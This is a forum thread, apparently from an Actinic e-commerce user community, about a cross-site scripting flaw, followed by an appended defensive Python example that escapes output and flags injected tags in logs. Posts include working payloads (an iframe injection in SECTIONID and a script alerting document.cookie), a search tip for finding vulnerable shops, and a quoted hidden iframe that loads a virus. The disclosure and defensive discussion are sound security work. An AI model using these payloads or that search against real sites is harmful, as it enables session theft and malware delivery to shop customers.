
Cross Site Scripting issue?

    #16
    don't delete

    Hi Norman

    Thank you for the input.
    I don't think your post should be deleted; this is a serious flaw that needs to be addressed.

    We now use the ScanAlert service; below is their description of the flaw and its possible consequences:

    "The cross-site scripting attack is one of the most common, yet overlooked, security problems facing web developers today. A web site is vulnerable if it displays user-submitted content without checking for malicious script tags.

    The target of cross-site scripting attacks is not the server itself, but the user files on the server, such as forms and other dynamic content. All a malicious attacker needs to do is find a page that does not properly sanitize user input, but returns the scripting code verbatim to the browser of a visitor to that website. It is important to note that websites that use SSL are just as vulnerable as websites that do not encrypt browser sessions.

    The damage caused by such an attack can range from stealing session and cookie data from your customers to loading a virus payload onto their computer via browser."


    Given that we are all running ecommerce operations this could be a serious issue. Also we would not necessarily be aware of it until it was too late.

    This does need a fix for all versions of Actinic, not just current versions.

    Given that Actinic is the leader in ecommerce solutions it is not unreasonable to suppose that someone has already tried this exploit.

    This is not the first time we have come across serious security flaws in the product or a lacklustre response.



      #17
      "Lacklustre response"? Be fair, it was only publicly reported as recently as February 2002

      Aquazuro - designer stainless steel accessories



        #18
        I have a custom actinic.pm for both 851 (first version) and 703 which both pass Scanalert. Both of these came via Actinic so I would assume the v8 fix will be in the next patch.



          #19
          Actually, there are a fair few inline tricks you can use to cross-site script.

          How about the image onload tag?



            #20
            Originally posted by purple
            I have a custom actinic.pm for both 851 (first version) and 703 which both pass Scanalert. Both of these came via Actinic so I would assume the v8 fix will be in the next patch.
            Actinic/John - is there any chance of others getting these (I am running 707), particularly if this thread is going to tell everyone how to hack our sites?

            Aquazuro - designer stainless steel accessories



              #21
              Originally posted by purple
              I have a custom actinic.pm for both 851 (first version) and 703 which both pass Scanalert. Both of these came via Actinic so I would assume the v8 fix will be in the next patch.
              We are currently running Business v 7.0.4.

              Any chance of sharing this with us or Actinic making it available for all previous versions?



                #22
                It's important to remember that these cross-site scripting issues are theoretical, and there have never been any reports of malicious activity on Actinic sites (I did try Norman's posted code, but just got a script error).

                But because ScanAlert is another one of these automated validation engines that require everyone to jump through their particular hoops, we are making some changes on the next build of 8.5.2 so Actinic stores pass the ScanAlert tests.



                  #23
                  Originally posted by cdicken
                  we are making some changes on the next build of 8.5.2
                  there's going to be a NEXT build of 8.5.2??
                  Or do you mean for the release of 8.5.2? (in which case it can't be that imminent LOL)
                  Tracey



                    #24
                    Or do you mean for the release of 8.5.2?
                    This is the one. I probably should have had a comma in there.



                      #25
                      Originally posted by cdicken
                      This is the one. I probably should have had a comma in there.
                      Sorry, Chris.
                      I wasn't meaning to sound pedantic. I just had visions of various incarnations of 8.5.2 to rival the dual-personality of 8.5.1
                      Tracey



                        #26
                        It's important to remember that these cross-site scripting issues are theoretical, and there have never been any reports of malicious activity on Actinic sites
                        http://community.actinic.com/showthr...highlight=hack

                        This site appears to have been hacked to deliver a virus - are you sure that wasn't delivered to the page by cross site scripting?

                        It's almost certainly a hack. Probably this bit that's been added to the end of your pages:
                        <hr /> <html><iframe width=0 height=0 frameborder=0 src= http://www.free&&&20.com/portal/index.php?aff=metalizor marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>

                        I tried the pasted code

                        Code:
                        www.mysite.com/cgi-bin/ss000001.pl?SECTIONID=%27%22%3E%3Ciframe+src%3D%22http%3A%2F%2Fgoogle.com%22%3E%3C%2Fiframe%3E

                        [attached image: hack.gif]

                        and it worked, notice the nice Google G. This is a problem - and we're on 8.5.1
                        Wayne Theisinger

                        The Web's just settling in. We got the tech, now let's put up something that matters.



                          #27
                          Originally posted by budgetbumps
                          to rival the dual-personality of 8.5.1
                          Triple you mean?



                            #28
                            Chris said
                            I did try Norman's posted code, but just got a script error
                            The "A General Script Error Occurred" message isn't the important bit (just a consequence of the corrupted URL).

                            What's of concern is that the JavaScript that I stuck into the URL got executed in the customer's browser in the context of the Site's URL. You should see a popup Alert window containing some tecchy stuff.

                            Luckily all it does is display the current Site cookie with a tiny bit of formatting for legibility.
                            Norman - www.drillpine.biz
                            Edinburgh, U K / Bitez, Turkey



                              #29
                              Hi Norman

                              I tried that in Firefox and IE without any luck, I couldn't get an alert box to appear. How odd.



                                #30
                                Weird. If I google for "inurl:acatalog", I get a huge list of Actinic sites. Viewing Cart in any of them and subsequently pasting ?<script>alert(unescape(document.cookie))</script> into the address bar (replacing everything after the existing ".pl") pops up the cookie here. Happens in IE. FF seems to mangle the special characters in the JS causing it not to execute.
                                Norman - www.drillpine.biz
                                Edinburgh, U K / Bitez, Turkey

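As an added example (not from this thread and not Actinic's own code), the Python below shows the defender's side of what #26, #28 and #30 describe: the SECTIONID value from the posted request is URL-decoded the way the CGI sees it, reflected into a page once verbatim and once HTML-encoded, and a small check over constructed access-log lines flags requests whose decoded query carries an injected tag. The CGI path and parameter name are those posted in the thread; www.mysite.com, the log lines and the tag list are constructed assumptions.

```python
import html
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Request as posted in #26 (www.mysite.com is the poster's placeholder host).
POSTED_REQUEST = ("http://www.mysite.com/cgi-bin/ss000001.pl?SECTIONID="
                  "%27%22%3E%3Ciframe+src%3D%22http%3A%2F%2Fgoogle.com%22%3E%3C%2Fiframe%3E")

# Tags that have no business appearing inside a reflected catalogue parameter (assumed list).
TAG_RE = re.compile(r"<\s*(script|iframe|img|object|embed)\b", re.IGNORECASE)


def section_id(url):
    """Return SECTIONID as the CGI script sees it, i.e. after URL decoding."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("SECTIONID", [""])[0]


def render_unescaped(value):
    """Vulnerable pattern: the parameter is echoed into the page verbatim."""
    return f'<input name="SECTIONID" value="{value}">'


def render_escaped(value):
    """Fixed pattern: HTML-encode on output, so quotes and angle brackets stay data, not markup."""
    return f'<input name="SECTIONID" value="{html.escape(value, quote=True)}">'


def contains_markup(page):
    """True if a rendered fragment carries one of the tags in TAG_RE."""
    return TAG_RE.search(page) is not None


# Constructed access-log lines (common log format); only the second carries a payload.
LOG_LINES = [
    '10.0.0.5 - - [01/Mar/2007:10:00:00 +0000] "GET /cgi-bin/ss000001.pl?SECTIONID=Shoes HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Mar/2007:10:00:01 +0000] "GET /cgi-bin/ss000001.pl?SECTIONID='
    '%27%22%3E%3Ciframe+src%3D%22http%3A%2F%2Fgoogle.com%22%3E%3C%2Fiframe%3E HTTP/1.1" 200 512',
]


def suspicious_requests(lines):
    """Return request targets whose decoded query string contains an injected tag."""
    hits = []
    for line in lines:
        m = re.search(r'"(?:GET|POST) (\S+) ', line)
        if m and TAG_RE.search(unquote_plus(urlsplit(m.group(1)).query)):
            hits.append(m.group(1))
    return hits


if __name__ == "__main__":
    payload = section_id(POSTED_REQUEST)
    print("unescaped render injects markup:", contains_markup(render_unescaped(payload)))
    print("escaped render injects markup:  ", contains_markup(render_escaped(payload)))
    print("flagged log requests:", suspicious_requests(LOG_LINES))
```

The escaped renderer is the shape of fix a patched actinic.pm needs: encode at the point of output, not by trying to strip individual tags from the input.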
